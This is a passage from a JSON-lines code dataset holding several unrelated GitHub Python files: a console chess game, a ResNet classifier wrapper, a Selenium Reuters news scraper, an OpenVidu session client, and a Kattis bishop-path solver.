board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n            field[i_field][j_field] = 'Q'\r\n        elif (board[i_board][j_board]['type']== 'king') and board[i_board][j_board]['owner_color'] == CONST_COLOR_BLACK:\r\n            field[i_field][j_field] = 'k'  \r\n        elif (board[i_board][j_board]['type']== 'king') and board[i_board][j_board]['owner_color'] == CONST_COLOR_WHITE:\r\n            field[i_field][j_field] = 'K'\r\n\r\n\r\n\r\n\r\ndef create_board():\r\n    global board\r\n    i = 1\r\n    for j in range(8):\r\n        board[i][j] = create_black_pawn(CONST_COLOR_BLACK,i,j)\r\n    i = 6\r\n    for j in range(8):\r\n        board[i][j] = create_white_pawn(CONST_COLOR_WHITE,i,j)\r\n    board[0][0] = create_rook(CONST_COLOR_BLACK, 0, 0)\r\n    board[0][7] = create_rook(CONST_COLOR_BLACK, 0, 7)\r\n    board[7][0] = create_rook(CONST_COLOR_WHITE, 7, 0)\r\n    board[7][7] = create_rook(CONST_COLOR_WHITE, 7, 7)\r\n    board[0][1] = create_knight(CONST_COLOR_BLACK, 0, 1)\r\n    board[0][6] = create_knight(CONST_COLOR_BLACK, 0, 6)\r\n    board[7][1] = create_knight(CONST_COLOR_WHITE, 7, 1)\r\n    board[7][6] = create_knight(CONST_COLOR_WHITE, 7, 6)\r\n    board[0][2] = create_bishop(CONST_COLOR_BLACK, 0, 2)\r\n    board[0][5] = create_bishop(CONST_COLOR_BLACK, 0, 5)\r\n    board[7][2] = create_bishop(CONST_COLOR_WHITE, 7, 2)\r\n    board[7][5] = create_bishop(CONST_COLOR_WHITE, 7, 5)\r\n    board[0][3] = create_queen(CONST_COLOR_BLACK, 0, 3)\r\n    board[0][4] = create_king(CONST_COLOR_BLACK, 0, 4)\r\n    board[7][3] = create_queen(CONST_COLOR_WHITE, 7, 3)\r\n    board[7][4] = create_king(CONST_COLOR_WHITE, 7, 4)\r\n\r\n\r\ndef print_field():\r\n    board_to_field()\r\n    for i in range(12):\r\n        print (' '.join(field[i]))\r\n\r\ndef move(coord1,coord2,color):\r\n    current_i = dict_field[coord1][0] - 2\r\n    current_j = dict_field[coord1][1] - 2\r\n    i = dict_field[coord2][0] - 2\r\n    j = dict_field[coord2][1] - 2\r\n    if board[current_i][current_j] == None:\r\n        print(\"There is no piece on this square\")\r\n        return False\r\n    if board[current_i][current_j]['owner_color'] != color:\r\n        print('That piece belongs to your opponent')\r\n        return False\r\n    figure = board[current_i][current_j]\r\n    check_moves = dict_figure_types[figure['type']][0]\r\n    check_attack = dict_figure_types[figure['type']][1]\r\n    if check_moves(figure,i,j) or check_attack(figure,i,j):\r\n        board[i][j] = board[current_i][current_j]\r\n        board[current_i][current_j] = None\r\n        board[i][j]['owner_current_i'] = i\r\n        board[i][j]['owner_current_j'] = j\r\n        return True\r\n    else:\r\n        print('That move is not possible')\r\n        return False\r\n\r\ndef figure_color(counter):\r\n    color = ''\r\n    if (counter % 2 != 0):\r\n        color = 'white' \r\n    else:\r\n        color = 'black'\r\n    return color\r\n\r\ndef find_king(color):\r\n    king_i = 0\r\n    king_j = 0\r\n    for i in range(len(board)):\r\n        for j in range(len(board)):\r\n            if board[i][j] is None:\r\n                continue\r\n            if (board[i][j]['type'] == 'king') and board[i][j]['owner_color'] == color:\r\n                king_i = i\r\n                king_j = j\r\n    return king_i,king_j\r\n\r\ndef check(color,x=None,y=None):\r\n    if x is None or y is None: \r\n        king_i,king_j = find_king(color)\r\n    else:\r\n        king_i = x\r\n        king_j = y\r\n    for i in range(len(board)):\r\n        for j in range(len(board)):\r\n            if board[i][j] == None:\r\n                continue\r\n            figure = board[i][j]\r\n            check_attack = dict_figure_types[figure['type']][1]\r\n            if board[i][j]['owner_color'] != color and check_attack(figure,king_i,king_j):\r\n                return True,i,j\r\n    return False, i, j\r\n\r\ndef coord_generator(king_i,king_j, attack_i,attack_j):\r\n    if attack_i == king_i: #moving right or left\r\n        if king_j < attack_j:\r\n            for col in 
range(king_j + 1, attack_j):\r\n                yield attack_i,col\r\n        elif king_j > attack_j:\r\n            for col in range(attack_j + 1, king_j):  # strictly the squares between attacker and king\r\n                yield attack_i,col\r\n    elif attack_j == king_j: #moving down or up\r\n        if king_i < attack_i:\r\n            for row in range(king_i + 1, attack_i):\r\n                yield row,attack_j\r\n        elif king_i > attack_i:\r\n            for row in range(attack_i + 1, king_i):\r\n                yield row,attack_j\r\n    else:\r\n        def go_up(num):\r\n            return num + 1\r\n        def go_down(num):\r\n            return num - 1 \r\n        d_row = abs(king_i - attack_i)\r\n        if king_i > attack_i:\r\n            i_mod = go_up\r\n        else:\r\n            i_mod = go_down\r\n        if king_j > attack_j:\r\n            j_mod = go_up\r\n        else:\r\n            j_mod = go_down    \r\n        target_i = attack_i\r\n        target_j = attack_j\r\n        for m in range(d_row-1):\r\n            target_i = i_mod(target_i)\r\n            target_j = j_mod(target_j)\r\n            yield target_i,target_j\r\n\r\n\r\n\r\ndef mate(color,attack_i,attack_j):\r\n    king_i,king_j = find_king(color)\r\n    move = False\r\n    king = board[king_i][king_j]\r\n    king_check_moves = dict_figure_types[king['type']][0]\r\n\r\n    for i in range(len(board)):\r\n        for j in range(len(board)):\r\n            king_move = king_check_moves(king,i,j)\r\n            if king_move:\r\n                saved = board[i][j]  # remember the square so the trial move can be undone\r\n                board[i][j] = board[king_i][king_j]\r\n                if not check(color,i,j)[0]:  # check() returns a tuple; only its first element says whether the king is attacked\r\n                    move = True\r\n                board[i][j] = saved\r\n    cover = False\r\n    if not board[attack_i][attack_j]['type'] == 'knight':\r\n        for x,y in coord_generator(king_i,king_j, attack_i,attack_j):\r\n            for i in range(len(board)):\r\n                for j in range(len(board)):\r\n                    if board[i][j] == None:\r\n                        continue\r\n                    figure = board[i][j]\r\n                    check_moves = dict_figure_types[figure['type']][0]\r\n                    if board[i][j]['owner_color'] == color and check_moves(figure,x,y):\r\n                        saved = board[x][y]\r\n                        board[x][y] = board[i][j]\r\n                        if not check(color,king_i,king_j)[0]:\r\n                            cover = True \r\n                        board[x][y] = saved\r\n    cont_attack = False\r\n    for i in range(len(board)):\r\n        for j in range(len(board)):\r\n\r\n            if board[i][j] == None:\r\n                continue\r\n            figure = board[i][j]\r\n            check_attack = dict_figure_types[figure['type']][1]\r\n            if board[i][j]['owner_color'] == color and check_attack(figure,attack_i,attack_j):\r\n                attacker = board[attack_i][attack_j]\r\n                board[attack_i][attack_j] = board[i][j]\r\n                if not check(color,king_i,king_j)[0]:\r\n                    cont_attack = True \r\n                board[attack_i][attack_j] = attacker  # put the attacker back after the trial capture\r\n    if move or cover or cont_attack:\r\n        return False\r\n    return True    \r\n\r\n\r\ndef help(x_coord,y_coord):\r\n    board_to_field()\r\n    figure = board[x_coord][y_coord]\r\n    check_attack = dict_figure_types[figure['type']][1]\r\n    check_moves = dict_figure_types[figure['type']][0]\r\n    for i in range(12):\r\n        for j in range(12):\r\n            if i == x_coord+2 and j == y_coord+2:\r\n                print(Fore.GREEN + field[i][j]+Style.RESET_ALL, end = ' ')\r\n                continue\r\n            if (i<2) or (i>9) or (j<2) or (j>9):\r\n                print(field[i][j], end = ' ')\r\n                continue\r\n            if check_attack(figure,i-2,j-2) or check_moves(figure,i-2,j-2):\r\n                print(Back.GREEN + field[i][j]+Style.RESET_ALL, end = ' ')\r\n                continue  \r\n            print(field[i][j], end = ' ')\r\n        print()\r\n\r\n\r\ndef game():\r\n    def black_or_white_color(counter):\r\n        if counter % 2 != 0:\r\n            return CONST_COLOR_WHITE\r\n        else:\r\n            return CONST_COLOR_BLACK    \r\n    def black_or_white_str(counter):\r\n        if counter % 2 != 0:\r\n            return 'white'\r\n        else:\r\n            return 'black'\r\n    counter = 1    \r\n    create_board()\r\n    print_field()\r\n    win = False\r\n    while not win:\r\n        coord = []\r\n        coord.append(input(f'Enter the coordinates of the {black_or_white_str(counter)} piece: ').lower())\r\n        if coord[0] 
in dict_field:\r\n            x_coord = dict_field[coord[0]][0] - 2\r\n            y_coord = dict_field[coord[0]][1] - 2\r\n            if board[x_coord][y_coord] is not None:\r\n                if board[x_coord][y_coord]['owner_color'] == black_or_white_color(counter):\r\n                    help(x_coord,y_coord)\r\n                else:\r\n                    print('Invalid piece selected')\r\n                    continue\r\n            else:\r\n                print('Invalid piece selected')\r\n                continue\r\n        else:\r\n            print('No such coordinate')\r\n            continue\r\n        coord.append(input('Enter your move: ').lower())\r\n        if move(coord[0],coord[1],black_or_white_color(counter)):\r\n            print_field()\r\n            counter += 1\r\n            is_checked, attack_i, attack_j = check(black_or_white_color(counter))\r\n            if is_checked:\r\n                print(f'The {black_or_white_str(counter)} king is in check') \r\n                if board[attack_i][attack_j]['owner_color'] != black_or_white_color(counter) and mate(black_or_white_color(counter),attack_i,attack_j):  \r\n                    print(f'The {black_or_white_str(counter)} king is checkmated')\r\n                    print('The game is over')\r\n                    win = True\r\n            \r\n            \r\ngame()\r\n","repo_name":"NadiaNurm/UniversityProjects","sub_path":"chess/НурминскаяШахматы.py","file_name":"НурминскаяШахматы.py","file_ext":"py","file_size_in_byte":21821,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"26680389042","text":"import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport importlib\n\n\ndef class_for_name(module_name, class_name):\n    # load the module, will raise ImportError if module cannot be loaded\n    m = importlib.import_module(module_name)\n    # get the class, will raise AttributeError if class cannot be found\n    return getattr(m, class_name)\n\n\nclass ResNet(nn.Module):\n    def __init__(self, out_dim, encoder='resnet50', pretrained=True):\n        super(ResNet, self).__init__()\n        self.pretrained = pretrained\n        assert encoder in ['resnet18', 'resnet34', 'resnet50', 'resnet101', 'resnet152'], \"Incorrect encoder type\"\n\n        resnet = class_for_name(\"torchvision.models\", encoder)(pretrained=pretrained)\n\n        # last_layer = list(resnet.children())[-1]\n        # print(last_layer)\n        self.resnet = torch.nn.Sequential(*(list(resnet.children())[:-1]))\n        self.last_layer = nn.Linear(in_features=2048, out_features=out_dim, bias=True)\n\n    def forward(self, x):\n        x = self.resnet(x)\n        x = x.squeeze(3).squeeze(2)\n        x = self.last_layer(x)\n\n        return x\n\n\nif __name__ == '__main__':\n    # import torchvision.models\n    # model = torchvision.models.resnet152(pretrained=True)\n    # # print(model)\n    #\n    # input = torch.randn(5, 3, 384, 512)\n    # output = model(input)\n\n    #\n    # print('\\n')\n    # newmodel = torch.nn.Sequential(*(list(model.children())[:-1]))\n    # print(newmodel)\n\n    resnet = ResNet(out_dim=4)\n    input = torch.randn(5, 3, 384, 512)\n    output = resnet(input)\n    print('input.shape: {}'.format(input.shape))\n    print('output.shape: {}'.format(output.shape))\n","repo_name":"rthapa-26/FGVC-Plant-Pathology-2020-challenge-dataset-","sub_path":"AppleDiseaseClassifyCode/network.py","file_name":"network.py","file_ext":"py","file_size_in_byte":1663,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"936674874","text":"from selenium import webdriver\nimport pandas as pd\nimport numpy as np\nfrom utils import scroll\n\n\nclass Reuters:\n    url_scheme = \"https://\"\n    url_host = \"www.reuters.com/\"\n    url_path = \"companies/\"\n    driver_path = \"D:/talks-of-stocks/scrapers/chromedriver_win32/chromedriver.exe\"\n\n\n    def __init__(self, ticker):\n        self.ticker = ticker\n        self.url = self.url_scheme + 
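# --- Editor's addition: a minimal usage sketch for the ResNet wrapper above. ---
# It shows the common transfer-learning setup: freeze the pretrained backbone so
# only the new `last_layer` head is trained. Note the hard-coded in_features=2048
# only matches resnet50/101/152, so this sketch assumes one of those encoders;
# the optimizer and learning rate are illustrative, not from the original repo.
model = ResNet(out_dim=4, encoder='resnet50', pretrained=True)
for param in model.resnet.parameters():
    param.requires_grad = False          # keep the pretrained features fixed
optimizer = torch.optim.Adam(model.last_layer.parameters(), lr=1e-3)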
self.url_host + self.url_path + self.ticker + \".OQ/news\"\n        self.driver = webdriver.Chrome(executable_path=self.driver_path)\n\n        self.driver.implicitly_wait(30)\n\n\n    def open_newsfeed(self):\n        self.driver.get(self.url)\n        scroll(self.driver, 5)\n\n\n    def get_article_listings(self):\n        self.article_listings = self.driver.find_elements_by_class_name(\"MarketStoryItem-container-3rpwz\")\n\n\n    def get_data(self):\n        self.data = []\n\n        for article_listing in self.article_listings:\n            # Store current article details\n            article_details = []\n\n            # Retrieve headline and first sentence\n            article_listing_components = article_listing.text.split(\"\\n\")\n            headline = article_listing_components[0]\n            sentence = article_listing_components[1]\n\n            # Retrieve current article href\n            article = self.driver.find_element_by_link_text(headline)\n            article_link = article.get_attribute(\"href\")\n\n            # Open current article in a new tab\n            self.driver.execute_script(\"window.open('');\")\n            self.driver.switch_to_window(self.driver.window_handles[1])\n            self.driver.get(article_link)\n\n            # Retrieve article date\n            date_components = self.driver.find_element_by_class_name(\"ArticleHeader_date\").text.split(\"/\")\n            date = date_components[0][0:-1] # removes the space at the end\n\n            # Go back to main article listings tab\n            self.driver.close()\n            self.driver.switch_to_window(self.driver.window_handles[0])\n\n            # Store current article details\n            article_details.append(date)\n            article_details.append(headline)\n            article_details.append(sentence)\n\n            # Storing current article details in the dataset\n            self.data.append(article_details)\n\n\n    def export_data(self):\n        # Obtaining individual columns\n        data = np.array(self.data)\n        dates = data[:, 0]\n        headlines = data[:, 1]\n        sentences = data[:, 2]\n        column_headers = [\"Date\", \"Headline\", \"Sentence\"]\n\n        # Pandas DataFrame wrapper\n        self.dataset = pd.DataFrame(columns=column_headers)\n        self.dataset[\"Date\"] = dates\n        self.dataset[\"Headline\"] = headlines\n        self.dataset[\"Sentence\"] = sentences\n\n        # Exporting news data to CSV\n        self.dataset.to_csv(self.ticker + \"_news.csv\", index=False)\n\n\naapl_scraper = Reuters(\"AAPL\")\naapl_scraper.open_newsfeed()\naapl_scraper.get_article_listings()\naapl_scraper.get_data()\naapl_scraper.export_data()\n","repo_name":"anishseeniraj/newspip","sub_path":"scrapers/Reuters.py","file_name":"Reuters.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"38723779898","text":"\"\"\"OpenViduSession class.\"\"\"\nfrom typing import Iterator, List\nfrom datetime import datetime\nfrom threading import RLock\nfrom requests_toolbelt.sessions import BaseUrlSession\n\nfrom .exceptions import OpenViduSessionDoesNotExistsError, OpenViduConnectionDoesNotExistsError, OpenViduError\nfrom .openviduconnection import OpenViduConnection\n\n\nclass OpenViduSession(object):\n    \"\"\"\n    This object represents an OpenVidu Session.\n    A session is a group of users communicating with each other.\n    \"\"\"\n\n    def __init__(self, session: BaseUrlSession, lock: RLock, data: dict):\n        \"\"\"\n        This is meant for internal use, thus you should not call it.\n        Use `OpenVidu.get_session` to get an instance of this class.\n        \"\"\"\n\n        self._session = session\n        self._data = data\n        self._lock = lock  # Sadly using this lock locks all other session objects as well\n\n    def fetch(self):\n        \"\"\"\n        Updates every property of the OpenViduSession with the current status it has in OpenVidu Server. 
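# --- Editor's addition: a hedged note on the scraper above. ---
# The Reuters scraper uses the Selenium 3 era API (executable_path=,
# find_elements_by_class_name, switch_to_window). Under Selenium 4 the same
# steps would look roughly like this sketch; Service and By are standard
# selenium imports, and the class name is the one the scraper already targets.
from selenium import webdriver
from selenium.webdriver.chrome.service import Service
from selenium.webdriver.common.by import By

driver = webdriver.Chrome(service=Service("chromedriver"))
listings = driver.find_elements(By.CLASS_NAME, "MarketStoryItem-container-3rpwz")
driver.switch_to.window(driver.window_handles[1])   # replaces switch_to_window()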
This is especially useful for getting the list of active connections to the OpenViduSession (get_connections()).\n        To update every OpenViduSession object owned by OpenVidu object, call OpenVidu.fetch()\n\n        :return: True if the OpenViduSession status has changed with respect to the server, False if not. This applies to any property or sub-property of the object\n        \"\"\"\n        with self._lock:\n            r = self._session.get(f\"api/sessions/{self.id}\")\n\n            if r.status_code == 404:\n                self._data = {}\n                raise OpenViduSessionDoesNotExistsError()\n\n            r.raise_for_status()\n\n            is_changed = self._data != r.json()\n\n            if is_changed:\n                self._data = r.json()\n\n            return is_changed\n\n    def close(self):\n        \"\"\"\n        Gracefully closes the Session: unpublishes all streams and evicts every participant.\n        Further calls to this object will fail.\n        \"\"\"\n        with self._lock:\n            r = self._session.delete(f\"/api/sessions/{self.id}\")\n\n            if r.status_code == 404:\n                self._data = {}\n                raise OpenViduSessionDoesNotExistsError()\n\n            r.raise_for_status()\n            self._data = {}\n\n    @property\n    def is_valid(self) -> bool:\n        \"\"\"\n        Checks if this session still exists on the server, as of the last call to fetch().\n\n        :return: True if the session exists. False otherwise.\n        \"\"\"\n        with self._lock:\n            return bool(self._data)\n\n    def generate_token(self, role: str = 'PUBLISHER', data: str = None, video_max_recv_bandwidth: int = None,\n                       video_min_recv_bandwidth: int = None, video_max_send_bandwidth: int = None,\n                       video_min_send_bandwidth: int = None, allowed_filters: list = None) -> str:\n        \"\"\"\n        Gets a new token associated with this Session.\n\n        In the video bandwidth settings 0 means unconstrained. Setting any of them (other than None) overrides the values configured for the server.\n\n        https://docs.openvidu.io/en/2.12.0/reference-docs/REST-API/#post-apitokens\n\n        :param role: Allowed values: `SUBSCRIBER`, `PUBLISHER` or `MODERATOR`\n        :param data: metadata associated to this token (usually participant's information)\n        :param video_max_recv_bandwidth: Maximum number of Kbps that the client owning the token will be able to receive from Kurento Media Server.\n        :param video_min_recv_bandwidth: Minimum number of Kbps that the client owning the token will try to receive from Kurento Media Server.\n        :param video_max_send_bandwidth: Maximum number of Kbps that the client owning the token will be able to send to Kurento Media Server.\n        :param video_min_send_bandwidth: Minimum number of Kbps that the client owning the token will try to send to Kurento Media Server.\n        :param allowed_filters: Array of strings containing the names of the filters the user owning the token will be able to apply.\n        :return: The token as String.\n        \"\"\"\n        with self._lock:\n\n            if not self._data:  # Fail early... 
and always\n                raise OpenViduSessionDoesNotExistsError()\n\n            # Prepare parameters\n\n            if role not in ['SUBSCRIBER', 'PUBLISHER', 'MODERATOR']:\n                raise ValueError(f\"Role must be any of SUBSCRIBER, PUBLISHER or MODERATOR, not {role}\")\n\n            parameters = {\"session\": self.id, \"role\": role}\n\n            if data:\n                parameters['data'] = data\n\n            kurento_options = {\n                \"videoMaxRecvBandwidth\": video_max_recv_bandwidth,\n                \"videoMinRecvBandwidth\": video_min_recv_bandwidth,\n                \"videoMaxSendBandwidth\": video_max_send_bandwidth,\n                \"videoMinSendBandwidth\": video_min_send_bandwidth,\n                \"allowedFilters\": allowed_filters\n            }\n\n            kurento_options = {k: v for k, v in kurento_options.items() if v is not None}\n\n            if kurento_options:\n                parameters['kurentoOptions'] = kurento_options\n\n            # send request\n            r = self._session.post('api/tokens', json=parameters)\n\n            if r.status_code == 404:\n                raise OpenViduSessionDoesNotExistsError()\n            elif r.status_code == 400:\n                raise ValueError()\n\n            return r.json()['token']\n\n    @property\n    def connections(self) -> Iterator[OpenViduConnection]:\n        \"\"\"\n        Returns the list of active connections to the session.\n\n        :return: A generator for OpenViduConnection objects.\n        \"\"\"\n        with self._lock:\n            if not self._data:\n                raise OpenViduSessionDoesNotExistsError()\n\n            for connection_info in self._data['connections']['content']:\n                yield OpenViduConnection(self._session, self.id, connection_info)\n\n    def get_connection(self, connection_id: str) -> OpenViduConnection:\n        \"\"\"\n        Get a currently active connection to the server.\n\n        :param connection_id: Connection id.\n        :return: An OpenViduConnection object.\n        \"\"\"\n        with self._lock:\n            if not self._data:\n                raise OpenViduSessionDoesNotExistsError()\n\n            for connection_info in self._data['connections']['content']:\n                if connection_info['connectionId'] == connection_id:\n                    return OpenViduConnection(self._session, self.id, connection_info)\n\n            raise OpenViduConnectionDoesNotExistsError()\n\n    def signal(self, type_: str = None, data: str = None, to: List[OpenViduConnection] = None):\n        \"\"\"\n        Sends a signal to all participants in the session or specific connections if the `to` property is defined.\n        OpenViduConnection objects also implement this method.\n\n        https://docs.openvidu.io/en/2.12.0/reference-docs/REST-API/#post-apisignal\n\n        :param type_: Type of the signal. In the body example of the table above, only users subscribed to Session.on('signal:MY_TYPE') will trigger that signal. Users subscribed to Session.on('signal') will trigger signals of any type.\n        :param data: Actual data of the signal.\n        :param to: List of OpenViduConnection objects to which you want to send the signal. If this property is not set (None) the signal will be sent to all participants of the session.\n        \"\"\"\n        with self._lock:\n            if not self._data:  # Fail early... 
and always\n                raise OpenViduSessionDoesNotExistsError()\n\n            if to:\n                recipient_list = [connection.id for connection in to]\n            else:\n                recipient_list = None\n\n            parameters = {\n                \"session\": self.id,\n                \"to\": recipient_list,\n                \"type\": type_,\n                \"data\": data\n            }\n\n            parameters = {k: v for k, v in parameters.items() if v is not None}\n\n            # send request\n            r = self._session.post('api/signal', json=parameters)\n\n            if r.status_code == 404:\n                raise OpenViduSessionDoesNotExistsError()\n            elif r.status_code == 400:\n                raise ValueError()\n            elif r.status_code == 406:\n                raise OpenViduConnectionDoesNotExistsError()\n\n            r.raise_for_status()\n\n    def publish(self, rtsp_uri: str, data: str = '', adaptive_bitrate: bool = True,\n                only_play_with_subscribers: bool = True, type_: str = \"IPCAM\") -> OpenViduConnection:\n        \"\"\"\n        Publishes a new IPCAM rtsp stream to the session.\n\n        Unlike `OpenVidu.create_session` this method does not call fetch() automatically, since the server returns enough data to construct the connection object.\n        Keep in mind, that if you want the newly created Connection to appear in the `connections` list, you should call fetch() before accessing the list!\n\n        https://docs.openvidu.io/en/2.12.0/reference-docs/REST-API/#post-apisessionsltsession_idgtconnection\n\n        :param rtsp_uri: RTSP URI of the IP camera. For example: `rtsp://your.camera.ip:7777/path`.\n        :param data: Metadata you want to associate with the camera's participant.\n        :param adaptive_bitrate: Whether to use adaptive bitrate or not.\n        :param only_play_with_subscribers: Enable the IP camera stream only when some user is subscribed to it.\n        :param type_: Which type of stream will be published. Defaults to `IPCAM`.\n        :return: An OpenVidu connection object representing the newly created connection.\n        \"\"\"\n        with self._lock:\n            if not self._data:  # Fail early... and always\n                raise OpenViduSessionDoesNotExistsError()\n\n            parameters = {\n                \"type\": type_,\n                \"rtspUri\": rtsp_uri,\n                \"adaptativeBitrate\": adaptive_bitrate,\n                \"onlyPlayWithSubscribers\": only_play_with_subscribers,\n                \"data\": data\n            }\n\n            r = self._session.post(f'api/sessions/{self.id}/connection', json=parameters)\n\n            if r.status_code == 404:\n                raise OpenViduSessionDoesNotExistsError()\n            elif r.status_code == 400:\n                raise ValueError()\n            elif r.status_code == 500:\n                raise OpenViduError(r.content)\n\n            return OpenViduConnection(self._session, self.id, r.json())\n\n    @property\n    def connection_count(self) -> int:\n        \"\"\"\n        Get the number of active connections to the session.\n\n        :return: The number of active connections.\n        \"\"\"\n        with self._lock:\n            if not self._data:\n                raise OpenViduSessionDoesNotExistsError()\n\n            return self._data['connections']['numberOfElements']\n\n    @property\n    def id(self) -> str:\n        \"\"\"\n        :return: The ID of this session.\n        \"\"\"\n        with self._lock:\n            if not self._data:\n                raise OpenViduSessionDoesNotExistsError()\n\n            return self._data['sessionId']\n\n    @property\n    def created_at(self) -> datetime:\n        \"\"\"\n        :return: datetime object when the session was created in UTC time.\n        \"\"\"\n        with self._lock:\n            return datetime.utcfromtimestamp(self._data['createdAt'] / 1000.0)\n\n    @property\n    def is_being_recorded(self) -> bool:\n        \"\"\"\n        :return: True if the session is being recorded. 
False otherwise.\n        \"\"\"\n        with self._lock:\n            return self._data['recording']\n\n    @property\n    def media_mode(self) -> str:\n        \"\"\"\n        :return: Media mode configured for the session ('ROUTED' or 'RELAYED').\n        \"\"\"\n        with self._lock:\n            return self._data['mediaMode']\n","repo_name":"swipswaps/pyopenvidu","sub_path":"pyopenvidu/openvidusession.py","file_name":"openvidusession.py","file_ext":"py","file_size_in_byte":11752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"} +{"seq_id":"17817745664","text":"\"\"\"\nhttps://open.kattis.com/problems/chess\n\n\nThe basic premise of this code is to calculate how a bishop \nwould move from any given position on the chessboard to any \nother position. Check out the full description of the coding \nchallenge here: https://open.kattis.com/problems/chess \n\nDifficulty rating 2.9🟡 medium\n\n\"\"\"\n\n#TODO: Re-map the coordinate plane to clean up code and readability\n#This is done and working, but I may come back and clean it up more!\n\n#mapping created on chess board \n    #A 1 is [0 , [0 , 0 ]] Black\n    #A 8 is [1 , [0 , 0 ]] White\n    #       [Color, [up/down, distance right]]\nmapping = {\n    \"A 1\" : [0,[0,0]],\n    \"B 2\" : [0,[0,1]],\n    \"C 3\" : [0,[0,2]],\n    \"D 4\" : [0,[0,3]],\n    \"E 5\" : [0,[0,4]],\n    \"F 6\" : [0,[0,5]],\n    \"G 7\" : [0,[0,6]],\n    \"H 8\" : [0,[0,7]],\n    \n    \"C 1\" : [0,[-1,1]],\n    \"D 2\" : [0,[-1,2]],\n    \"E 3\" : [0,[-1,3]],\n    \"F 4\" : [0,[-1,4]],\n    \"G 5\" : [0,[-1,5]],\n    \"H 6\" : [0,[-1,6]],\n\n    \"E 1\" : [0,[-2,2]],\n    \"F 2\" : [0,[-2,3]],\n    \"G 3\" : [0,[-2,4]],\n    \"H 4\" : [0,[-2,5]],\n\n    \"G 1\" : [0,[-3,3]],\n    \"H 2\" : [0,[-3,4]],\n\n    \"A 3\" : [0,[1,1]],\n    \"B 4\" : [0,[1,2]],\n    \"C 5\" : [0,[1,3]],\n    \"D 6\" : [0,[1,4]],\n    \"E 7\" : [0,[1,5]],\n    \"F 8\" : [0,[1,6]],\n\n    \"A 5\" : [0,[2,2]],\n    \"B 6\" : [0,[2,3]],\n    \"C 7\" : [0,[2,4]],\n    \"D 8\" : [0,[2,5]],\n\n    \"A 7\" : [0,[3,3]],\n    \"B 8\" : [0,[3,4]],\n\n    #white squares\n    \"A 8\" : [1, [0,0]],\n    \"B 7\" : [1, [0,1]],\n    \"C 6\" : [1, [0,2]],\n    \"D 5\" : [1, [0,3]],\n    \"E 4\" : [1, [0,4]],\n    \"F 3\" : [1, [0,5]],\n    \"G 2\" : [1, [0,6]],\n    \"H 1\" : [1, [0,7]],\n    \n    \"A 6\" : [1, [-1,1]],\n    \"B 5\" : [1, [-1,2]],\n    \"C 4\" : [1, [-1,3]],\n    \"D 3\" : [1, [-1,4]],\n    \"E 2\" : [1, [-1,5]],\n    \"F 1\" : [1, [-1,6]],\n\n    \"A 4\" : [1, [-2,2]],\n    \"B 3\" : [1, [-2,3]],\n    \"C 2\" : [1, [-2,4]],\n    \"D 1\" : [1, [-2,5]],\n\n    \"A 2\" : [1, [-3,3]],\n    \"B 1\" : [1, [-3,4]],\n\n    \"C 8\" : [1, [1,1]],\n    \"D 7\" : [1, [1,2]],\n    \"E 6\" : [1, [1,3]],\n    \"F 5\" : [1, [1,4]],\n    \"G 4\" : [1, [1,5]],\n    \"H 3\" : [1, [1,6]],\n\n    \"E 8\" : [1, [2,2]],\n    \"F 7\" : [1, [2,3]],\n    \"G 6\" : [1, [2,4]],\n    \"H 5\" : [1, [2,5]],\n\n    \"G 8\" : [1, [3,3]],\n    \"H 7\" : [1, [3,4]],\n}\n\n\ndef moveBishop(numberOfInput,coordinateInputList):\n\n    for i in range(numberOfInput):\n        numMoves = 0\n\n        CoordinateHolder = coordinateInputList[i]\n\n        #Convert A 1 to [0, [0,0]] etc\n        startCoordinate = mapping[CoordinateHolder[0:3]]\n        endCoordinate = mapping[CoordinateHolder[4:7]]\n\n        #put the starting coordinate into the outputString\n        outputString = CoordinateHolder[0:3]\n\n        #if going to same location\n        if startCoordinate[1] == endCoordinate[1]:\n            numMoves = 0\n        #if row or col is the same\n        elif startCoordinate[1][0] == endCoordinate[1][0] or startCoordinate[1][1] == endCoordinate[1][1]:\n            outputString += \" \" + CoordinateHolder[4:7]\n            numMoves = 1\n\n        else:\n            numMoves = 2\n            # # find the linking move\n            # print(\"START\",startCoordinate, \"END:\", endCoordinate)\n            if 
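# --- Editor's addition: a hedged usage sketch for the OpenViduSession class above. ---
# The record's own docstrings reference OpenVidu.get_session, OpenVidu.create_session
# and OpenVidu.fetch, so this assumes the accompanying OpenVidu entry-point class from
# the same pyopenvidu package; the server URL and secret are placeholders.
from pyopenvidu import OpenVidu

openvidu = OpenVidu("https://localhost:4443/", "MY_SECRET")
session = openvidu.create_session()
token = session.generate_token(role="PUBLISHER", data="participant-1")
session.signal(type_="greeting", data="hello everyone")  # broadcast to all connections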
[startCoordinate[0],[startCoordinate[1][0],endCoordinate[1][1]]] in list(mapping.values()):\n # for the key and value pairings in the dict\n for key,val in mapping.items() :\n # if current value == possible coordinate \n if val == [startCoordinate[0],[startCoordinate[1][0],endCoordinate[1][1]]]: \n outputString += \" \" + key\n # print(startCoordinate[0],[startCoordinate[1][0],endCoordinate[1][1]])\n\n else:\n for key,val in mapping.items() :\n if val == [startCoordinate[0],[endCoordinate[1][0],startCoordinate[1][1]]]:\n outputString += \" \" + key\n\n #add final destination to outputString\n outputString += \" \" + CoordinateHolder[4:7]\n \n # if color is different\n if mapping[CoordinateHolder[0:3]][0] != mapping[CoordinateHolder[4:7]][0]:\n print(\"Impossible\")\n else:\n print(str(numMoves),outputString)\n\n\nif __name__ == \"__main__\":\n #How many tests should be done?\n numberOfInput = int(input()) \n\n #initialize \n inputCoordinates = []\n\n for i in range(numberOfInput):\n #Take in all the inputs into a list\n inputCoordinates.append(input())\n moveBishop(numberOfInput,inputCoordinates)\n\n#note to self, clean code up before submitting it, review every comment.","repo_name":"JDNafz/JDNafz","sub_path":"Open Kattis/Chess.py","file_name":"Chess.py","file_ext":"py","file_size_in_byte":4593,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32350010583","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib.image as mpimg\nfrom PIL import Image\n\n\ndef 